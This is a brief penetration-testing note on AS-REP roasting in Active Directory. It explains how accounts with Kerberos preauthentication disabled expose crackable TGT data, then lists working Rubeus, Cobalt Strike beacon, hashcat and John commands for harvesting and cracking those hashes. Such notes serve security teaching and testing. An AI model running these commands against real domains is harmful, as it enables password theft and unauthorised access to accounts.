ASREP-Roasting

One of the first steps in Kerberos authentication is preauthentication. Pre-authentication uses the user's password to encrypt a timestamp. The domain controller (DC) will decrypt this to validate the correct password and not have a previous request replayed. A vulnerability can result when preauthentication is disabled.

Once this is disabled, a hacker can request authentication data for any user, and the DC will return an encrypted ticket-granting ticket (TGT). It can then be used to brute force in an offline environment to crack the password.

Preauthentication can be disabled on any user account in Active Directory on the Account tab under the Account options. Look for the checkbox "Do not require Kerberos preauthentication."

# Request TGT Ticket For All The Vulnerable Users
Rubeus.exe asreproast /outfile:hashes.txt /format:hashcat

# Request for one user
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe asreproast /user:svc_oracle /nowrap

# Cracking
hashcat64.exe -a 0 -m 18200 hashes.txt wordlist.txt

# John
john --format=krb5asrep --wordlist=wordlist svc_oracle